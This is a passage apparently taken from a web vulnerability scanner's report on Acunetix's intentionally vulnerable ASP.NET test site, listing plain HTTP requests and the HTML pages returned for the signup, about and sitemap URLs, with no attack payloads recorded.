href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 323 bytes.	GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13106
Response Body - size: 13,106 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx+i81I" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc+mKdRBm3AUE" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/sitemap.xml
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 283 bytes.	GET http://testaspnet.vulnweb.com/sitemap.xml HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 1245
Response Body - size: 1,245 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/about.aspx
Method	POST
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 404 bytes.	POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/about.aspx Content-Length: 981 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 981 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 14619
Response Body - size: 14,619 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a 